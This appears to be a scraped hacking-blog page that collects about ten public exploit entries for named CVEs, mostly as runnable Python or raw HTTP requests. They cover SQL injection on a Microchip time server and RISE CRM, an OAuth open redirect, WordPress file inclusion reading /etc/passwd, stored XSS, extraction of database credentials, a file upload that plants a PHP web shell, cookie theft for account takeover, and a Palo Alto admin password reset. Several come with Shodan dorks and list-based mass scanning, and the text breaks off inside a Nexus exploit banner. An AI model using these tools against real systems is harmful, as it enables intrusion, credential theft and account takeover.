# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
# Exploit Author: Armando Huesca Prida, Marco Negro
# Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli
# Date of Disclosure: 27/06/2024
# Date of CVE Publication: 4/10/2024
# Exploit Publication: 11/10/2024
# Vendor Homepage: https://www.microchip.com/
# Version: Firmware release 1.0 through 2.4.7
# Tested on: Firmware release 2.3.12
# CVE: CVE-2024-7801
# External References:
# URL: https://www.cve.org/cverecord?id=CVE-2024-7801
# URL: https://www.0xhuesca.com/2024/10/cve-2024-7801.html
# URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-unathenticated-sql-injection
# URL: https://www.gruppotim.it/it/footer/red-team.html
# Vulnerability Description:
The TimeProvider® 4100 Grandmaster firmware has a SQL injection vulnerability in the “get_chart_data” web resource, specifically the “channelId” parameter is inserted directly into the SQL query (SQLite) at the table's name query parameter from which the FROM operation is performed. Unauthenticated threat actors can manipulate queries to execute malicious SQL commands against the device.
# Example of Malicious SQL Payload:
SELECT%20sql%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20sqlite_master$20WHERE&20type='table'$20LIMIT%201%20OFFSET%200--
# Proof of Concept - PoC:
By manually modifying the following request, it is possible to execute malicious SQL commands against the device. The list of values that must be updated in the exploit HTTP request is given below:
- [malicious SQL payload]
- [device IP]
# Exploit - HTTP Request:
POST /get_chart_data HTTP/1.1
Host: [device IP]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 146
Origin: https://[device IP]
Referer: https://[device IP]/perfmon_synce_stat
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
metric=mtie_a&xRange=1&tStart=-1&channelName=tenMHz&channelId=
1_status%20UNION%20 [malicious SQL payload] %20UNION%20SELECT%201,%202,%203,%204,%205,%206,%207,%208,%209,%2010,%2011,%2012,%2013,%2014,%2015,%2016,%2017,%2018,%2019,%2020,%2021,%2022,%2023,%2024,%2025,%2026,%2027,%2028,%2029,%2030,%2031,%2032,%2033,%2034,%2035,%2036,%2037,%2038,%2039,%2040,%2041,%2042,%2043,%2044,%2045,%2046,%2047,%2048,%2049,%2050,%2051,%2052,%2053,%2054,%2055,%2056,%2057,%2058,%2059,%2060,%2061,%2062,%2063,%2064,%2065,%2066,%2067,%2068%20FROM%20tenMHz1
# End
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
86397247
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: Next.js Middleware Bypass Vulnerability (CVE-2025-29927)
# Date: 2025-03-26
# Exploit Author: kOaDT
# Vendor Homepage: https://nextjs.org/
# Software Link: https://github.com/vercel/next.js
# Version: 13.0.0 - 13.5.8 / 14.0.0 - 14.2.24 / 15.0.0 - 15.2.2 / 11.1.4 - 12.3.4
# Tested on: Ubuntu 22.04.5 LTS
# CVE: CVE-2025-29927
# PoC: https://raw.githubusercontent.com/kOaDT/poc-cve-2025-29927/refs/heads/main/exploit.js
# POC GitHub Repository: https://github.com/kOaDT/poc-cve-2025-29927/tree/main
# Exploit Title : IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow
======== < Table of Contents > ================================================
0. Overview
1. Detailed Description
2. Proof Of Concept
3. Solution
4. Disclosure Timeline
5. References
6. Credits
7. Legal Notices
======== < 0. Overview > ======================================================
Revision:
1.0
Impact:
By persuading a victim to visit a specially crafted Web site, a remote
attacker could exploit this vulnerability to spoof the URL displayed
to redirect a user to a malicious Web site that would appear to be
trusted. This could allow the attacker to obtain highly sensitive
information or conduct further attacks against the victim.
Severity:
NIST: High
IBM: Medium
CVSS Score:
NIST 8.2 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N)
IBM 6.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N)
CVE-ID:
CVE-2024-35133
Vendor:
IBM
Affected Products:
IBM Security Verify Access
IBM Security Verify Access Docker
Affected Versions:
10.0.0 - 10.0.8
Product Description:
IBM Security Verify Access is a complete authorization and network
security policy management solution. It provides end-to-end protection
of resources over geographically dispersed intranets and extranets.
In addition to state-of-the-art security policy management, IBM Security
Verify Access provides authentication, authorization, data security, and
centralized resource management capabilities.
IBM Security Verify Access offers the following features:
Authentication ~ Provides a wide range of built-in authenticators and
supports external authenticators.
Authorization ~ Provides permit and deny decisions for protected resources
requests in the secure domain through the authorization API.
Data security and centralized resource management ~ Manages secure access
to private internal network-based resources by using the public Internet's
broad connectivity and ease of use with a corporate firewall system.
======== < 1. Detailed Description > ==========================================
During a Penetration Test of the OAuth flow for a client, it was found an
Open Redirect vulnerability that can led to the leakage of the OAuth "code" variable.
It was possible to bypass the parser's logic responsible for verifying the
correctness and the validity of the "redirect_uri" parameter during an OAuth
flow by leveraging RFC 3986 (3.2.1) providing a username and password directly
in the Uniform Resource Identifier (URI).
By providing as the "username" field a legitimate and expected domain, it
was possible to bypass the whitelist filter used by "IBM Security Verify Access"
and cause an Open Redirect to any arbitrary domain controlled by the attacker,
not only altering the expected flow and redirect a user to a malicious
Web site that would appear to be trusted.
This could allow the attacker to obtain highly sensitive like the OAuth "code"
token or conduct further attacks against the victim
======== < 2. Proof of Concepts > =============================================
===== REQUEST =====
[[
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
]]
===== RESPONSE =====
[[
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:bypass@0lmd9sa7p0cez16vdcldhcgygpmga6yv.oastify.com/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
]]
======== < 3. Solution > ======================================================
Refer to IBM Security Bulletin 7166712 for patch, upgrade or
suggested workaround information.
See "References" for more details.
======== < 4. Disclosure Timeline > ===========================================
19/03/2024 - Vulnerability discovered by the Security Researcher (Giulio Garzia)
21/03/2024 - Vulnerability shared with the client who committed the
Penetration Test on his infrastructure, relying on IBM SVA
02/04/2024 - Vulnerability shared with IBM
02/04/2024 - Vulnerability taken over by IBM
14/05/2024 - Vulnerability confirmed by IBM
18/07/2024 - Pre-release provided by IBM to the customer to verify the
resolution of the vulnerability
27/08/2024 - Security Bulletin and vulnerability shared by IBM
======== < 5. References > ====================================================
(1) https://www.ibm.com/support/pages/security-bulletin-security-vulnerability-was-fixed-ibm-security-verify-access-cve-2024-35133
(2) https://exchange.xforce.ibmcloud.com/vulnerabilities/291026
(3) https://nvd.nist.gov/vuln/detail/CVE-2024-35133
(4) https://cwe.mitre.org/data/definitions/178.html
======== < 6. Credits > =======================================================
This vulnerability was discovered and reported by:
Giulio Garzia 'Ozozuz'
Contacts:
https://www.linkedin.com/in/giuliogarzia/
https://github.com/Ozozuz
======== < 7. Legal Notices > ================================================
Copyright (c) 2024 Giulio Garzia "Ozozuz"
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without mine express
written consent. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information.
Use of the information constitutes acceptance for use in an AS IS
condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on,this information.
# Exploit Title: Kubio AI Page Builder <= 2.5.1 - Local File Inclusion (LFI)
# Date: 2025-04-04
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://wordpress.org/plugins/kubio/
# Software Link: https://downloads.wordpress.org/plugin/kubio.2.5.1.zip
# Reference: https://www.cve.org/CVERecord?id=CVE-2025-2294
# Version: <= 2.5.1
# Tested on: WordPress 6.4.2 (Ubuntu 22.04 LTS)
# CVE: CVE-2025-2294
"""
Description:
The Kubio AI Page Builder plugin for WordPress contains a Local File Inclusion vulnerability
in the `kubio_hybrid_theme_load_template` function. This allows unauthenticated attackers to
read arbitrary files via path traversal. Can lead to RCE when combined with file upload capabilities.
"""
import argparse
import re
import requests
from urllib.parse import urljoin
from concurrent.futures import ThreadPoolExecutor
class Colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def parse_version(version_str):
parts = list(map(int, version_str.split('.')))
while len(parts) < 3:
parts.append(0)
return tuple(parts[:3])
def check_plugin_version(target_url):
readme_url = urljoin(target_url, 'wp-content/plugins/kubio/readme.txt')
try:
response = requests.get(readme_url, timeout=10)
if response.status_code == 200:
version_match = re.search(r'Stable tag:\s*([\d.]+)', response.text, re.I)
if not version_match:
return False, "Version not found"
version_str = version_match.group(1).strip()
try:
parsed_version = parse_version(version_str)
except ValueError:
return False, f"Invalid version format: {version_str}"
return parsed_version <= (2, 5, 1), version_str
return False, f"HTTP Error {response.status_code}"
except Exception as e:
return False, f"Connection error: {str(e)}"
def exploit_vulnerability(target_url, file_path, show_content=False):
exploit_url = f"{target_url}/?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template={file_path}"
try:
response = requests.get(exploit_url, timeout=10)
if response.status_code == 200:
if show_content:
print(f"\n{Colors.OKGREEN}[+] File content from {target_url}:{Colors.ENDC}")
print(Colors.OKBLUE + response.text + Colors.ENDC)
return True
return False
except Exception as e:
return False
def process_url(url, file_path, show_content, output_file):
print(f"{Colors.HEADER}[*] Checking: {url}{Colors.ENDC}")
is_vuln, version_info = check_plugin_version(url)
if is_vuln:
print(f"{Colors.OKGREEN}[+] Vulnerable: {url} (Version: {version_info}){Colors.ENDC}")
exploit_success = exploit_vulnerability(url, file_path, show_content)
if output_file and exploit_success:
with open(output_file, 'a') as f:
f.write(f"{url}\n")
return url if exploit_success else None
else:
print(f"{Colors.FAIL}[-] Not vulnerable: {url} ({version_info}){Colors.ENDC}")
return None
def main():
parser = argparse.ArgumentParser(description="Kubio Plugin Vulnerability Scanner")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-u", "--url", help="Single target URL (always shows file content)")
group.add_argument("-l", "--list", help="File containing list of URLs")
parser.add_argument("-f", "--file", default="../../../../../../../../etc/passwd",
help="File path to exploit (default: ../../../../../../../../etc/passwd)")
parser.add_argument("-o", "--output", help="Output file to save vulnerable URLs")
parser.add_argument("-v", "--verbose", action="store_true",
help="Show file contents when using -l/--list mode")
parser.add_argument("-t", "--threads", type=int, default=5,
help="Number of concurrent threads for list mode")
args = parser.parse_args()
# Determine operation mode
if args.url:
# Single URL mode - always show content
process_url(args.url, args.file, show_content=True, output_file=args.output)
elif args.list:
# List mode - handle multiple URLs
with open(args.list, 'r') as f:
urls = [line.strip() for line in f.readlines() if line.strip()]
print(f"{Colors.BOLD}[*] Starting scan with {len(urls)} targets...{Colors.ENDC}")
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = []
for url in urls:
futures.append(
executor.submit(
process_url,
url,
args.file,
args.verbose,
args.output
)
)
vulnerable_urls = [future.result() for future in futures if future.result()]
print(f"\n{Colors.BOLD}[*] Scan complete!{Colors.ENDC}")
print(f"{Colors.OKGREEN}[+] Total vulnerable URLs found: {len(vulnerable_urls)}{Colors.ENDC}")
if args.output:
print(f"{Colors.OKBLUE}[+] Vulnerable URLs saved to: {args.output}{Colors.ENDC}")
if __name__ == "__main__":
main()
# Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting (XSS)
# Original Author: Wordfence Security Team
# Exploit Author: Al Baradi Joy
# Exploit Date: March 13, 2024
# Vendor Homepage: https://exclusiveaddons.com/
# Software Link: https://wordpress.org/plugins/exclusive-addons-for-elementor/
# Version: Up to and including 2.6.9
# Tested Versions: 2.6.9
# CVE ID: CVE-2024-1234
# Vulnerability Type: Stored Cross-Site Scripting (XSS)
# Description:
The Exclusive Addons for Exclusive Addons for Elementor for WordPress, in versions up to
and including 2.6.9, is vulnerable to stored cross-site scripting (XSS) via
the 's' parameter. Due to improper input sanitization and output escaping,
an attacker with contributor-level permissions or higher can inject
arbitrary JavaScript that executes when a user views the affected page.
# Proof of Concept: Yes
# Categories: Web Application, Cross-Site Scripting (XSS), WordPress Plugin
# CVSS Score: 6.5 (Medium)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
# Notes:
To exploit this vulnerability, an attacker needs an authenticated user role
with permission to edit posts. Injecting malicious JavaScript can lead to
session hijacking, redirections, and other client-side attacks.
## Exploit Code:
```python
import requests
from urllib.parse import urlparse
# Banner
def display_banner():
exploit_title = "CVE-2024-1234: Exclusive Addons for Elementor Plugin
Stored XSS"
print("="*50)
print(f"Exploit Title: {exploit_title}")
print("Made By Al Baradi Joy")
print("="*50)
# Function to validate URL
def validate_url(url):
# Check if the URL is valid and well-formed
parsed_url = urlparse(url)
if not parsed_url.scheme in ["http", "https"]:
print("Error: Invalid URL. Please ensure the URL starts with http://
or https://")
return False
return True
# Function to exploit XSS vulnerability
def exploit_xss(target_url):
# The XSS payload to inject
payload = "<script>alert('XSS Exploit')</script>"
# The parameters to be passed (in this case, we are exploiting the 's'
parameter)
params = {
's': payload
}
# Send a GET request to the vulnerable URL with the payload
try:
print(f"Sending exploit to: {target_url}")
response = requests.get(target_url, params=params, timeout=10)
# Check if the status code is OK and if the payload is reflected in
the response
if response.status_code == 200 and payload in response.text:
print(f"XSS exploit successful! Payload: {payload}")
elif response.status_code != 200:
print(f"Error: Received non-OK status code
{response.status_code}")
else:
print("Exploit failed or no XSS reflected.")
except requests.exceptions.RequestException as e:
print(f"Error: Request failed - {e}")
except Exception as e:
print(f"Unexpected error: {e}")
if __name__ == "__main__":
# Display banner
display_banner()
# Ask the user for the target URL
target_url = input("Enter the target URL: ").strip()
# Validate the provided URL
if validate_url(target_url):
# Call the exploit function if URL is valid
exploit_xss(target_url)
# Exploit Title: DataEase 2.4.0 - Database Configuration Information Exposure
# Shodan Dork: http.html:"dataease" #
# FOFA Dork: body="dataease" && title=="DataEase" #
# Exploit Author: ByteHunter #
# Email: 0xByteHunter@proton.me #
# vulnerable Versions: 2.4.0-2.5.0 #
# Tested on: 2.4.0 #
# CVE : CVE-2024-30269 #
############################ #
################################################################
import argparse
import requests
import re
import json
from tqdm import tqdm
def create_vulnerability_checker():
vulnerable_count = 0
def check_vulnerability(url):
nonlocal vulnerable_count
endpoint = "/de2api/engine/getEngine;.js"
full_url = f"{url}{endpoint}"
headers = {
"Host": url.split('/')[2],
"Accept-Encoding": "gzip, deflate, br",
"Accept": "*/*",
"Accept-Language": "en-US;q=0.9,en;q=0.8",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36",
"Connection": "close",
"Cache-Control": "max-age=0"
}
try:
response = requests.get(full_url, headers=headers, timeout=5)
if response.status_code == 200:
try:
json_data = response.json()
config = json_data.get("data", {}).get("configuration", None)
if config:
config_data = json.loads(config)
username = config_data.get("username")
password = config_data.get("password")
port = config_data.get("port")
if username and password:
vulnerable_count += 1
print(f"Vulnerable: {full_url}")
print(f"Username: {username}")
print(f"Password: {password}")
if port is not None:
print(f"Port Number: {port}")
except (json.JSONDecodeError, KeyError):
print(f"Invalid JSON response from {full_url}")
except requests.RequestException:
pass
return vulnerable_count
return check_vulnerability
def main():
parser = argparse.ArgumentParser(description="CVE-2024-30269 DataEase Database Creds Extractor")
parser.add_argument('-u', '--url', type=str, help='Single target')
parser.add_argument('-l', '--list', type=str, help='URL File List')
args = parser.parse_args()
check_vulnerability = create_vulnerability_checker()
if args.url:
check_vulnerability(args.url)
elif args.list:
try:
with open(args.list, 'r') as file:
urls = [url.strip() for url in file.readlines() if url.strip()]
total_urls = len(urls)
for url in tqdm(urls, desc="Processing URLs", unit="url"):
check_vulnerability(url)
# tqdm.write(f"Vulnerable Instances: {check_vulnerability(url)}/{total_urls}")
except FileNotFoundError:
print(f"File not found: {args.list}")
else:
print("provide a URL with -u or a file with -l.")
if __name__ == "__main__":
main()
# Exploit Title: WordPress Plugin Royal Elementor Addons <= 1.3.78 - Unauthenticated Arbitrary File Upload (RCE)
# Date: 2025-04-04
# Exploit Author: Sheikh Mohammad Hasan (https://github.com/4m3rr0r)
# Vendor Homepage: https://royal-elementor-addons.com
# Software Link: https://downloads.wordpress.org/plugin/royal-elementor-addons.1.3.78.zip
# Version: <= 1.3.78
# Tested on: WordPress 6.3.1, Royal Elementor Addons 1.3.78, Ubuntu 22.04 + Apache2 + PHP 8.1
# CVE: CVE-2023-5360
# Description:
# The Royal Elementor Addons and Templates WordPress plugin before 1.3.79 does not properly validate uploaded files,
# which allows unauthenticated users to upload arbitrary files (such as .php), leading to Remote Code Execution (RCE).
import requests
import json
import re
import argparse
import tempfile
from urllib.parse import urljoin
from rich.console import Console
requests.packages.urllib3.disable_warnings()
console = Console()
def get_nonce(target):
try:
r = requests.get(target, verify=False, timeout=10)
m = re.search(r'var\s+WprConfig\s*=\s*({.*?});', r.text)
if m:
nonce = json.loads(m.group(1)).get("nonce")
return nonce
except:
pass
return None
def upload_shell(target, nonce, file_path):
ajax_url = urljoin(target, "/wp-admin/admin-ajax.php")
with open(file_path, "rb") as f:
files = {"uploaded_file": ("poc.ph$p", f.read())}
data = {
"action": "wpr_addons_upload_file",
"max_file_size": 0,
"allowed_file_types": "ph$p",
"triggering_event": "click",
"wpr_addons_nonce": nonce
}
try:
r = requests.post(ajax_url, data=data, files=files, verify=False, timeout=10)
if r.status_code == 200 and "url" in r.text:
resp = json.loads(r.text)
return resp["data"]["url"]
except:
pass
return None
def generate_default_shell():
with tempfile.NamedTemporaryFile(delete=False, suffix=".php") as tmp:
shell_code = '<?php echo "Shell by 4m3rr0r - "; system($_GET["cmd"]); ?>'
tmp.write(shell_code.encode())
return tmp.name
def main():
parser = argparse.ArgumentParser(description="Royal Elementor Addons <= 1.3.78 - Unauthenticated Arbitrary File Upload (RCE)")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., https://target.com/)")
parser.add_argument("-f", "--file", help="Custom PHP shell file to upload")
args = parser.parse_args()
console.print("[cyan][*] Getting nonce from WprConfig JS object...[/cyan]")
nonce = get_nonce(args.url)
if not nonce:
console.print("[red][-] Failed to retrieve WprConfig nonce.[/red]")
return
console.print(f"[green][+] Nonce found: {nonce}[/green]")
if args.file:
shell_file = args.file
console.print(f"[cyan][*] Using provided shell: {shell_file}[/cyan]")
else:
console.print("[cyan][*] No shell provided. Creating default RCE shell...[/cyan]")
shell_file = generate_default_shell()
console.print(f"[green][+] Default shell created at: {shell_file}[/green]")
console.print("[cyan][*] Uploading shell...[/cyan]")
uploaded_url = upload_shell(args.url, nonce, shell_file)
if uploaded_url:
console.print(f"[green][+] Shell uploaded successfully: {uploaded_url}[/green]")
if not args.file:
console.print(f"[yellow][>] Access it with: {uploaded_url}?cmd=id[/yellow]")
else:
console.print("[red][-] Upload failed. Target may be patched or not vulnerable.[/red]")
if __name__ == "__main__":
main()
# Exploit Title: Litespeed Cache 6.5.0.1 - Authentication Bypass
# Google Dork: [if applicable]
# Date: reported on 17 September 2024
# Exploit Author: Gnzls
# Vendor Homepage: https://www.litespeedtech.com/
# Software Link: https://github.com/gbrsh/CVE-2024-44000?tab=readme-ov-file
# Version: 6.5.0.1
# Tested on: macOS M2 pro
# CVE : CVE-2024-44000
import re
import sys
import requests
import argparse
from urllib.parse import urljoin
def extract_latest_cookies(log_content):
user_cookies = {}
pattern_cookie = re.compile(r'Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%')
for line in log_content.splitlines():
cookie_match = pattern_cookie.search(line)
if cookie_match:
username = cookie_match.group(1)
user_cookies[username] = line
return user_cookies
def choose_user(user_cookies):
users = list(user_cookies.keys())
if not users:
print("No users found.")
sys.exit(1)
# Display user options
print("Select a user to impersonate:")
for idx, user in enumerate(users):
print(f"{idx + 1}. {user}")
# Get the user's choice
choice = int(input("Pick a number: ")) - 1
if 0 <= choice < len(users):
return users[choice], user_cookies[users[choice]]
else:
print("Invalid selection.")
sys.exit(1)
print("--- LiteSpeed Account Takeover exploit ---")
print(" (unauthorized account access)")
print("\t\t\tby Gonzales")
parser = argparse.ArgumentParser()
parser.add_argument('url', help='http://wphost')
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
log_file_url = urljoin(args.url, 'wp-content/debug.log')
response = requests.get(log_file_url)
if response.status_code == 200:
log_content = response.text
ucookies = extract_latest_cookies(log_content)
choice, cookie = choose_user(ucookies)
print(f"Go to {args.url}/wp-admin/ and set this cookie:")
print(cookie.split(']')[1])
else:
print("Log file not found.")
sys.exit(1)
1. Overview: Purpose and Target
The script aims to extract cookies (which contain session information) from a WordPress debug.log file, allowing the attacker to impersonate a logged-in user and access their account without authorization.
2. How the Code Works
extract_latest_cookies Function:
Purpose: This function scans the contents of the debug.log file and uses a regular expression to extract cookies for logged-in WordPress users.
How it Works:
The function reads each line of the debug.log file.
It searches for lines that contain cookies using the following regular expression: Cookie:\s.*?wordpress_logged_in_[^=]+=(.*?)%.
This pattern matches WordPress login cookies and extracts the username and cookie value.
The extracted cookie values are stored in a dictionary called user_cookies, where the keys are usernames and the values are the corresponding cookie strings.
choose_user Function:
Purpose: Once cookies are extracted, this function allows the attacker to select which user's cookie to use for impersonation.
How it Works:
It checks if there are any users (i.e., cookies) available.
If no cookies are found, it prints a message and exits the program.
If cookies are found, it prints a list of users and asks the attacker to select one.
Once a user is selected, the function returns the corresponding cookie for that user.
Main Program:
Purpose: The main part of the script handles the workflow of retrieving the debug.log file, extracting cookies, and allowing the attacker to choose which user to impersonate.
How It Works:
The script takes a URL as input, which is the target WordPress site (e.g., http://wphost).
It constructs the URL to the debug.log file (http://wphost/wp-content/debug.log).
The script sends an HTTP request to this URL to fetch the log file.
If the file is found (response status 200), it passes the file content to the extract_latest_cookies function to extract cookies.
The attacker selects which user's cookie to use, and the script prints the cookie information.
The attacker can then use this cookie to impersonate the selected user by setting it in their browser and accessing the WordPress admin panel (/wp-admin/).
requests Library:
This library is used to send HTTP requests to the target site and retrieve the debug.log file.
argparse Library:
This allows the user to input the target WordPress URL from the command line.
sys.exit() Function:
The script uses this to exit the program in case of errors, such as when no users are found or the log file is inaccessible.
3. Potential for Abuse
This script exploits a vulnerability in WordPress by targeting publicly accessible debug.log files. If a site has misconfigured logging, this file might be available to anyone on the internet. By accessing the debug.log file, an attacker can extract sensitive session cookies, impersonate users, and gain unauthorized access to WordPress accounts (including admin accounts).
# Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover
# Shodan Dork: html:"expedition project" #
# FOFA Dork: "expedition project" && icon_hash="1499876150" #
# Exploit Author: ByteHunter #
# Email: 0xByteHunter@proton.me #
# Vulnerable Versions: 1.2 < 1.2.92 #
# Tested on: 1.2.90.1 & 1.2.75 #
# CVE : CVE-2024-5910 #
############################ #
################################################################################################
import requests
import argparse
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)
ENDPOINT = '/OS/startup/restore/restoreAdmin.php'
def send_request(base_url):
url = f"{base_url}{ENDPOINT}"
print(f"Testing URL: {url}")
try:
response = requests.get(url, verify=False, timeout=7)
if response.status_code == 200:
print("✓ Admin password restored to: 'paloalto'\n")
print("✓ admin panel is now accessable via ==> admin:paloalto creds")
else:
print(f"Request failed with status code: {response.status_code}\n")
except requests.exceptions.RequestException as e:
print(f"Error sending request to {url}") #{e}
def main():
parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
parser.add_argument('-u', '--url', type=str, help='single target URL')
parser.add_argument('-l', '--list', type=str, help='URL target list')
args = parser.parse_args()
if args.url:
send_request(args.url)
elif args.list:
try:
with open(args.list, 'r') as file:
urls = file.readlines()
for base_url in urls:
send_request(base_url.strip())
except FileNotFoundError:
print(f"File not found: {args.list}")
else:
print("I need a URL address with -u or a URL file list with -l.")
if __name__ == '__main__':
main()
# Exploit Title: CodeCanyon RISE CRM 3.7.0 - SQL Injection
# Google Dork: N/A
# Date: September 19, 2024
# Exploit Author: Jobyer Ahmed
# Author Homepage: https://bytium.com
# Vulnerable Version: 3.7
# Patched Version: 3.7.1
# Tested on: Ubuntu 24.04, Debian Testing
##########################################
# CVE: CVE-2024-8945
############Instruction#######################
# 1. Login to Ultimate Project Manager 3.7
# 2. Add a New Dashboard
# 3. Launch the PoC Script
#
# Usage: python3 script.py <base_url> <email> <password>
###########################################
import requests
import sys
from termcolor import colored
def login_and_capture_session(base_url, email, password):
login_url = f"{base_url}/index.php/signin/authenticate"
login_data = {"email": email, "password": password, "redirect": ""}
login_headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
session = requests.Session()
response = session.post(login_url, data=login_data, headers=login_headers, verify=False)
if response.status_code == 200 and "dashboard" in response.url:
print(colored("[*] Logged in successfully.", "green"))
return session
else:
print(colored("[!] Login failed.", "red"))
return None
def send_payload(session, target_url, payload):
data = {
"id": payload,
"data": "false",
"title": "PoC Test",
"color": "#ff0000"
}
response = session.post(target_url, headers=session.headers, data=data, verify=False)
return response
def verify_vulnerability(session, target_url):
failed_payload = "-1 OR 1=2-- -"
failed_response = send_payload(session, target_url, failed_payload)
print(colored(f"\nFailed SQL Injection (False Condition) payload: {failed_payload}", "yellow"))
print(colored(f"{failed_response.text[:200]}", "cyan"))
successful_payload = "-1 OR 1=1-- -"
successful_response = send_payload(session, target_url, successful_payload)
if successful_response.status_code == 200 and "The record has been saved." in successful_response.text:
print(colored(f"[*] Vulnerability confirmed via SQL injection! Payload used: {successful_payload}", "green"))
print(colored(f"[*] Successful SQL Injection Response:\n{successful_response.text[:200]}", "cyan"))
print(colored("\nStatus: Vulnerable! Upgrade to patched version!", "red"))
else:
print(colored("\nNot vulnerable!","red"))
if __name__ == "__main__":
if len(sys.argv) != 4:
print("Usage: python3 script.py <base_url> <email> <password>")
sys.exit(1)
base_url, email, password = sys.argv[1], sys.argv[2], sys.argv[3]
session = login_and_capture_session(base_url, email, password)
if not session:
sys.exit(1)
session.headers.update({"User-Agent": "Mozilla/5.0", "Accept": "application/json", "X-Requested-With": "XMLHttpRequest"})
target_url = f"{base_url}/index.php/dashboard/save"
verify_vulnerability(session, target_url)
# Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal
# Google Dork: header="Server: Nexus/3.53.0-01 (OSS)"
# Date: 2024-09-22
# Exploit Author: VeryLazyTech
# GitHub: https://github.com/verylazytech/CVE-2024-4956
# Vendor Homepage: https://www.sonatype.com/nexus-repository
# Software Link: https://www.sonatype.com/nexus-repository
# Version: 3.53.0-01
# Tested on: Ubuntu 20.04
# CVE: CVE-2024-4956
import requests
import random
import argparse
from colorama import Fore, Style
green = Fore.GREEN
magenta = Fore.MAGENTA
cyan = Fore.CYAN
mixed = Fore.RED + Fore.BLUE
red = Fore.RED
blue = Fore.BLUE
yellow = Fore.YELLOW
white = Fore.WHITE
reset = Style.RESET_ALL
bold = Style.BRIGHT
colors = [green, cyan, blue]
random_color = random.choice(colors)
def banner():
banner = f"""{bold}{random_color}
______ _______ ____ ___ ____ _ _ _ _ ___ ____ __
